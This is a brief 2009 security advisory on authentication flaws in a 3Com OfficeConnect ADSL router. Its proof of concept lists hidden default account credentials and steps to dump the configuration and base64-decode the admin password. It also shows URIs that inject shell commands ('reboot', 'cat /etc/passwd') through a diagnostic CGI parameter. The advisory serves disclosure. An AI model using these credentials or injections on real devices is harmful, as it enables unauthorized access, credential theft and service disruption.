

Title 3Com OfficeConnect ADSL Wireless 11g Firewall Router Authentication Multiple Remote Vulnerabilities
Published 2009-10-19-12:00AM
Updated 2009-10-19-07:18PM
Class Access Validation Error
CVE  
Remote  Yes
Local  No
Credit  Andrea Fabrizi
Vulnerable  3Com OfficeConnect ADSL Wireless 11g Firewall Router 3.0
Not Vulnerable  
Code  Attackers can use readily available tools to exploit these issues. These example URIs and proof of concept demonstrate the issues:
1) SSH/Telnet to router using one of these hidden accounts:
support:support
user:5
nobody:admin
2) Type 9
3) Type 1
3) Type 3 to dump the configuration
4) Locate the sysPassword field:
<sysPassword value="cXdlcnR5Cg=="/>
5) Decode the admin password:
roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d
qwerty

http://www.example.com/utility.cgi?testType=1&IP=aaa || reboot
http://www.example.com/utility.cgi?testType=1&IP=aaa || cat /etc/passwd

Copyright 2007, SecurityDot
Fri, 27 Nov 2009 12:09:36 +0000
